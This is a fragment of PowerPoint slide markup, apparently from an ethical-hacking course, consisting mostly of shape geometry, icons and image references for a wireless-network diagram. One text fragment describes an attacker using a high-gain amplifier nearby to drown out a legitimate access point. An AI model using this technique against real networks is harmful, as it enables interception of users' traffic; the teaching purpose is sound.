                <a:gd name="T55" fmla="*/ 67317282 h 545"/>
                <a:gd name="T56" fmla="*/ 19075669 w 566"/>
                <a:gd name="T57" fmla="*/ 59881048 h 545"/>
                <a:gd name="T58" fmla="*/ 19075669 w 566"/>
                <a:gd name="T59" fmla="*/ 59881048 h 545"/>
                <a:gd name="T60" fmla="*/ 19075669 w 566"/>
                <a:gd name="T61" fmla="*/ 20221371 h 545"/>
                <a:gd name="T62" fmla="*/ 7217908 w 566"/>
                <a:gd name="T63" fmla="*/ 10958585 h 545"/>
                <a:gd name="T64" fmla="*/ 7217908 w 566"/>
                <a:gd name="T65" fmla="*/ 50618623 h 545"/>
                <a:gd name="T66" fmla="*/ 19075669 w 566"/>
                <a:gd name="T67" fmla="*/ 59881048 h 545"/>
                <a:gd name="T68" fmla="*/ 45497772 w 566"/>
                <a:gd name="T69" fmla="*/ 10045490 h 545"/>
                <a:gd name="T70" fmla="*/ 45497772 w 566"/>
                <a:gd name="T71" fmla="*/ 10045490 h 545"/>
                <a:gd name="T72" fmla="*/ 26422103 w 566"/>
                <a:gd name="T73" fmla="*/ 20221371 h 545"/>
                <a:gd name="T74" fmla="*/ 26422103 w 566"/>
                <a:gd name="T75" fmla="*/ 61707599 h 545"/>
                <a:gd name="T76" fmla="*/ 45497772 w 566"/>
                <a:gd name="T77" fmla="*/ 50618623 h 545"/>
                <a:gd name="T78" fmla="*/ 45497772 w 566"/>
                <a:gd name="T79" fmla="*/ 10045490 h 545"/>
                <a:gd name="T80" fmla="*/ 65604161 w 566"/>
                <a:gd name="T81" fmla="*/ 20221371 h 545"/>
                <a:gd name="T82" fmla="*/ 65604161 w 566"/>
                <a:gd name="T83" fmla="*/ 20221371 h 545"/>
                <a:gd name="T84" fmla="*/ 52844206 w 566"/>
                <a:gd name="T85" fmla="*/ 10958585 h 545"/>
                <a:gd name="T86" fmla="*/ 52844206 w 566"/>
                <a:gd name="T87" fmla="*/ 50618623 h 545"/>
                <a:gd name="T88" fmla="*/ 65604161 w 566"/>
                <a:gd name="T89" fmla="*/ 59881048 h 545"/>
                <a:gd name="T90" fmla="*/ 65604161 w 566"/>
                <a:gd name="T91" fmla="*/ 20221371 h 54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66" h="545">
                  <a:moveTo>
                    <a:pt x="565" y="516"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="565" y="516"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="565" y="537"/>
                    <a:pt x="551" y="544"/>
                    <a:pt x="537" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="530" y="544"/>
                    <a:pt x="523" y="544"/>
                    <a:pt x="516" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="381" y="438"/>
                    <a:pt x="381" y="438"/>
                    <a:pt x="381" y="438"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="544"/>
                    <a:pt x="191" y="544"/>
                    <a:pt x="191" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="544"/>
                    <a:pt x="183" y="544"/>
                    <a:pt x="176" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="544"/>
                    <a:pt x="162" y="544"/>
                    <a:pt x="162" y="544"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="431"/>
                    <a:pt x="7" y="431"/>
                    <a:pt x="7" y="431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="424"/>
                    <a:pt x="0" y="417"/>
                    <a:pt x="0" y="402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4"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="28" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="0"/>
                    <a:pt x="35" y="0"/>
                    <a:pt x="42" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="106"/>
                    <a:pt x="176" y="106"/>
                    <a:pt x="176" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="0"/>
                    <a:pt x="374" y="0"/>
                    <a:pt x="374" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="381" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="389" y="0"/>
                    <a:pt x="396" y="0"/>
                    <a:pt x="403" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="551" y="120"/>
                    <a:pt x="551" y="120"/>
                    <a:pt x="551" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="558" y="127"/>
                    <a:pt x="565" y="134"/>
                    <a:pt x="565" y="141"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="565" y="516"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="148" y="459"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="148" y="459"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="155"/>
                    <a:pt x="148" y="155"/>
                    <a:pt x="148" y="155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388"/>
                    <a:pt x="56" y="388"/>
                    <a:pt x="56" y="388"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="148" y="459"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="353" y="77"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="353" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="155"/>
                    <a:pt x="205" y="155"/>
                    <a:pt x="205" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="473"/>
                    <a:pt x="205" y="473"/>
                    <a:pt x="205" y="473"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="388"/>
                    <a:pt x="353" y="388"/>
                    <a:pt x="353" y="388"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="353" y="77"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="509" y="155"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="509" y="155"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="84"/>
                    <a:pt x="410" y="84"/>
                    <a:pt x="410" y="84"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="410" y="388"/>
                    <a:pt x="410" y="388"/>
                    <a:pt x="410" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="509" y="459"/>
                    <a:pt x="509" y="459"/>
                    <a:pt x="509" y="459"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="509" y="15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746DAB57-725F-4B56-9098-7E7443EE1746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="128202" y="2366367"/>
            <a:ext cx="512328" cy="512328"/>
            <a:chOff x="146184" y="3502593"/>
            <a:chExt cx="512328" cy="512328"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="177" name="Oval 176">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D52C908-2E52-4ACE-82B8-397B59872462}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="146184" y="3502593"/>
              <a:ext cx="512328" cy="512328"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="38100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2" name="Freeform 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{730AD9D5-5D6B-41CD-A6E1-144D9C2AD3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9253" y="3614689"/>
              <a:ext cx="286191" cy="288137"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 233363 w 68"/>
                <a:gd name="T1" fmla="*/ 10365 h 68"/>
                <a:gd name="T2" fmla="*/ 199045 w 68"/>
                <a:gd name="T3" fmla="*/ 210764 h 68"/>
                <a:gd name="T4" fmla="*/ 195613 w 68"/>
                <a:gd name="T5" fmla="*/ 217674 h 68"/>
                <a:gd name="T6" fmla="*/ 192181 w 68"/>
                <a:gd name="T7" fmla="*/ 217674 h 68"/>
                <a:gd name="T8" fmla="*/ 188749 w 68"/>
                <a:gd name="T9" fmla="*/ 217674 h 68"/>
                <a:gd name="T10" fmla="*/ 130409 w 68"/>
                <a:gd name="T11" fmla="*/ 193488 h 68"/>
                <a:gd name="T12" fmla="*/ 96091 w 68"/>
                <a:gd name="T13" fmla="*/ 231495 h 68"/>
                <a:gd name="T14" fmla="*/ 89227 w 68"/>
                <a:gd name="T15" fmla="*/ 234950 h 68"/>
                <a:gd name="T16" fmla="*/ 89227 w 68"/>
                <a:gd name="T17" fmla="*/ 234950 h 68"/>
                <a:gd name="T18" fmla="*/ 82363 w 68"/>
                <a:gd name="T19" fmla="*/ 224585 h 68"/>
                <a:gd name="T20" fmla="*/ 82363 w 68"/>
                <a:gd name="T21" fmla="*/ 179668 h 68"/>
                <a:gd name="T22" fmla="*/ 195613 w 68"/>
                <a:gd name="T23" fmla="*/ 41462 h 68"/>
                <a:gd name="T24" fmla="*/ 54909 w 68"/>
                <a:gd name="T25" fmla="*/ 162392 h 68"/>
                <a:gd name="T26" fmla="*/ 3432 w 68"/>
                <a:gd name="T27" fmla="*/ 141661 h 68"/>
                <a:gd name="T28" fmla="*/ 0 w 68"/>
                <a:gd name="T29" fmla="*/ 134751 h 68"/>
                <a:gd name="T30" fmla="*/ 3432 w 68"/>
                <a:gd name="T31" fmla="*/ 124385 h 68"/>
                <a:gd name="T32" fmla="*/ 219636 w 68"/>
                <a:gd name="T33" fmla="*/ 0 h 68"/>
                <a:gd name="T34" fmla="*/ 223068 w 68"/>
                <a:gd name="T35" fmla="*/ 0 h 68"/>
                <a:gd name="T36" fmla="*/ 229931 w 68"/>
                <a:gd name="T37" fmla="*/ 0 h 68"/>
                <a:gd name="T38" fmla="*/ 233363 w 68"/>
                <a:gd name="T39" fmla="*/ 10365 h 6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8" h="68">
                  <a:moveTo>
                    <a:pt x="68" y="3"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="61"/>
                    <a:pt x="58" y="61"/>
                    <a:pt x="58" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="62"/>
                    <a:pt x="57" y="62"/>
                    <a:pt x="57" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="63"/>
                    <a:pt x="56" y="63"/>
                    <a:pt x="56" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="63"/>
                    <a:pt x="55" y="63"/>
                    <a:pt x="55" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="56"/>
                    <a:pt x="38" y="56"/>
                    <a:pt x="38" y="56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28" y="67"/>
                    <a:pt x="27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5" y="67"/>
                    <a:pt x="24" y="66"/>
                    <a:pt x="24" y="65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0" y="40"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="38"/>
                    <a:pt x="0" y="37"/>
                    <a:pt x="1" y="36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6" y="0"/>
                    <a:pt x="66" y="0"/>
                    <a:pt x="67" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="1"/>
                    <a:pt x="68" y="2"/>
                    <a:pt x="68" y="3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F01F9699-AA02-49C9-B944-9670717DEEB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701314" y="4738405"/>
            <a:ext cx="2758466" cy="147732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 attacker stakes out the area from a nearby location with a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high-gain amplifier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drowning out the legitimate AP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567D6B5-AA74-4259-8E96-B194291E92CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="128202" y="4738405"/>
            <a:ext cx="512328" cy="512328"/>
            <a:chOff x="110220" y="5140432"/>
            <a:chExt cx="512328" cy="512328"/>
          </a:xfrm>
        </p:grpSpPr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4A3CFF54-15F2-4619-9855-F5E44C9D9556}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="110220" y="5140432"/>
              <a:ext cx="512328" cy="512328"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:lumMod val="75000"/>
                <a:lumOff val="25000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:ln w="38100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" name="Freeform 123">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4744A5F1-D277-4F5E-A204-91305430021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32094" y="5259159"/>
              <a:ext cx="268581" cy="274875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 123628 w 452"/>
                <a:gd name="T1" fmla="*/ 135490 h 462"/>
                <a:gd name="T2" fmla="*/ 123628 w 452"/>
                <a:gd name="T3" fmla="*/ 135490 h 462"/>
                <a:gd name="T4" fmla="*/ 195108 w 452"/>
                <a:gd name="T5" fmla="*/ 11703 h 462"/>
                <a:gd name="T6" fmla="*/ 195108 w 452"/>
                <a:gd name="T7" fmla="*/ 8102 h 462"/>
                <a:gd name="T8" fmla="*/ 191062 w 452"/>
                <a:gd name="T9" fmla="*/ 8102 h 462"/>
                <a:gd name="T10" fmla="*/ 71480 w 452"/>
                <a:gd name="T11" fmla="*/ 80124 h 462"/>
                <a:gd name="T12" fmla="*/ 4046 w 452"/>
                <a:gd name="T13" fmla="*/ 135490 h 462"/>
                <a:gd name="T14" fmla="*/ 15735 w 452"/>
                <a:gd name="T15" fmla="*/ 147644 h 462"/>
                <a:gd name="T16" fmla="*/ 39561 w 452"/>
                <a:gd name="T17" fmla="*/ 139542 h 462"/>
                <a:gd name="T18" fmla="*/ 67883 w 452"/>
                <a:gd name="T19" fmla="*/ 167450 h 462"/>
                <a:gd name="T20" fmla="*/ 59791 w 452"/>
                <a:gd name="T21" fmla="*/ 191307 h 462"/>
                <a:gd name="T22" fmla="*/ 67883 w 452"/>
                <a:gd name="T23" fmla="*/ 203461 h 462"/>
                <a:gd name="T24" fmla="*/ 123628 w 452"/>
                <a:gd name="T25" fmla="*/ 135490 h 462"/>
                <a:gd name="T26" fmla="*/ 135317 w 452"/>
                <a:gd name="T27" fmla="*/ 67520 h 462"/>
                <a:gd name="T28" fmla="*/ 135317 w 452"/>
                <a:gd name="T29" fmla="*/ 67520 h 462"/>
                <a:gd name="T30" fmla="*/ 135317 w 452"/>
                <a:gd name="T31" fmla="*/ 43663 h 462"/>
                <a:gd name="T32" fmla="*/ 159143 w 452"/>
                <a:gd name="T33" fmla="*/ 43663 h 462"/>
                <a:gd name="T34" fmla="*/ 159143 w 452"/>
                <a:gd name="T35" fmla="*/ 67520 h 462"/>
                <a:gd name="T36" fmla="*/ 135317 w 452"/>
                <a:gd name="T37" fmla="*/ 67520 h 4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2" h="462">
                  <a:moveTo>
                    <a:pt x="275" y="301"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="275" y="301"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="275" y="301"/>
                    <a:pt x="451" y="169"/>
                    <a:pt x="434" y="26"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="434" y="18"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="425" y="18"/>
                    <a:pt x="425" y="18"/>
                    <a:pt x="425" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="0"/>
                    <a:pt x="159" y="178"/>
                    <a:pt x="159" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="159"/>
                    <a:pt x="62" y="186"/>
                    <a:pt x="9" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="328"/>
                    <a:pt x="18" y="328"/>
                    <a:pt x="35" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="319"/>
                    <a:pt x="88" y="310"/>
                    <a:pt x="88" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="372"/>
                    <a:pt x="151" y="372"/>
                    <a:pt x="151" y="372"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="372"/>
                    <a:pt x="141" y="407"/>
                    <a:pt x="133" y="425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="443"/>
                    <a:pt x="133" y="461"/>
                    <a:pt x="151" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="398"/>
                    <a:pt x="292" y="407"/>
                    <a:pt x="275" y="301"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="301" y="150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="301" y="150"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="133"/>
                    <a:pt x="284" y="115"/>
                    <a:pt x="301" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="80"/>
                    <a:pt x="345" y="80"/>
                    <a:pt x="354" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="115"/>
                    <a:pt x="372" y="133"/>
                    <a:pt x="354" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="169"/>
                    <a:pt x="319" y="169"/>
                    <a:pt x="301" y="15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29CBB8BC-08DE-4B62-8265-5307EF4F77F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3898072" y="1185373"/>
            <a:ext cx="8038924" cy="5122153"/>
            <a:chOff x="3974671" y="1141828"/>
            <a:chExt cx="8038924" cy="5122153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5C90BE2F-4A0C-4683-ACA7-09B8A89212FE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8329452" y="1393049"/>
              <a:ext cx="3684143" cy="2780167"/>
              <a:chOff x="5847734" y="1042220"/>
              <a:chExt cx="3034959" cy="2163925"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="103" name="Picture 6" descr="X:\CEH v7 - Haja\Haja Premium Icons\Maraga\Community.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B02F2BD-A2C9-43E2-9398-2726E232B3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47734" y="1042220"/>
                <a:ext cx="3034959" cy="2163925"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:effectLst>
                <a:innerShdw blurRad="114300">
                  <a:prstClr val="black"/>
                </a:inn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04" name="Picture 16" descr="X:\CEH v7 - Haja\Haja Premium Icons\Maraga\Lady with Pink Bag.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{844046CE-7EE7-45A3-8DCB-2A2E9BF4D6F3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr preferRelativeResize="0">
                <a:picLocks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65213" y="1352532"/>
                <a:ext cx="265176" cy="54410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05" name="Picture 17" descr="X:\CEH v7 - Haja\Haja Premium Icons\Maraga\Lady with Phone and Brf Case-1.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3689D002-9AF6-484A-82B4-3E8911E482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08617" y="1959465"/>
                <a:ext cx="225168" cy="54911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06" name="Picture 18" descr="X:\CEH v7 - Haja\Haja Premium Icons\Maraga\Boy with laptop.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96A2C0A9-B97C-4422-A514-137BB5912C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01242" y="2599557"/>
                <a:ext cx="414021" cy="37263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pic>
          <p:nvPicPr>
            <p:cNvPr id="74" name="Picture 22" descr="E:\haja Premium\Wireless\router-yello.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FC65904-016D-46B6-9294-30A15F1F06E2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16794"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="7749112" y="4737976"/>
              <a:ext cx="1075323" cy="93052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A1EBD7F4-7B27-4756-BB4B-CE15C0B19B4E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3974671" y="1560497"/>
              <a:ext cx="3471549" cy="2568947"/>
              <a:chOff x="698841" y="1183130"/>
              <a:chExt cx="3034959" cy="2245870"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="100" name="Picture 24" descr="X:\CEH v7 - Haja\Haja Premium Icons\Maraga\Donuts.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5183DA6-5063-4657-A71D-48EEA3987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98841" y="1183130"/>
                <a:ext cx="3034959" cy="2245870"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:effectLst>
                <a:innerShdw blurRad="114300">
                  <a:prstClr val="black"/>
                </a:inn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01" name="Picture 15" descr="X:\CEH v7 - Haja\Haja Premium Icons\Maraga\User Walking.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BED7F604-1FA4-42AE-A569-C68B65095C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85470" y="1682261"/>
                <a:ext cx="179043" cy="45133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02" name="Picture 19" descr="X:\CEH v7 - Haja\Haja Premium Icons\Maraga\Lady user with Phone.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D108E9D3-34D2-4003-B861-954EC3A86E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3000" y="2362200"/>
                <a:ext cx="126165" cy="47812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76" name="Group 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E769D5B-712D-4A35-844A-84BB03F0D8B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4165866" y="1141828"/>
              <a:ext cx="3591769" cy="3586426"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="93" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50E1528E-BE37-4119-B7B6-013AFA8C54D2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5546" y="790136"/>
                <a:ext cx="2422854" cy="2419249"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41A5586A-5CB1-42FF-952D-659B9AEBF3FF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74661" y="949014"/>
                <a:ext cx="2104624" cy="2101493"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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5" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{367216C1-C102-4538-A77E-907FA8E0A7D7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342017" y="1116120"/>
                <a:ext cx="1769913" cy="1767280"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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6" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776D5E7B-A0BA-4DF8-9DA3-0AD2028811B2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509372" y="1283227"/>
                <a:ext cx="1435202" cy="1433066"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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7" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B0A3BF-4AA2-4E10-BB86-CC9DB3DECA1A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676728" y="1450334"/>
                <a:ext cx="1100490" cy="1098853"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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8" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08AD8295-D5A3-404D-B190-C886AEFFEA2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860668" y="1634000"/>
                <a:ext cx="732610" cy="731520"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{329C9AF4-18B0-4FA2-9A3A-B8C73F7881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1043821" y="1816880"/>
                <a:ext cx="366305" cy="365760"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="28575" algn="ctr">
                <a:solidFill>
                  <a:schemeClr val="tx1"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08925EAD-FCE1-45C9-B207-A76B0662D22D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8360867" y="1141828"/>
              <a:ext cx="3591769" cy="3586426"/>
              <a:chOff x="15546" y="790136"/>
              <a:chExt cx="2422854" cy="2419249"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="86" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
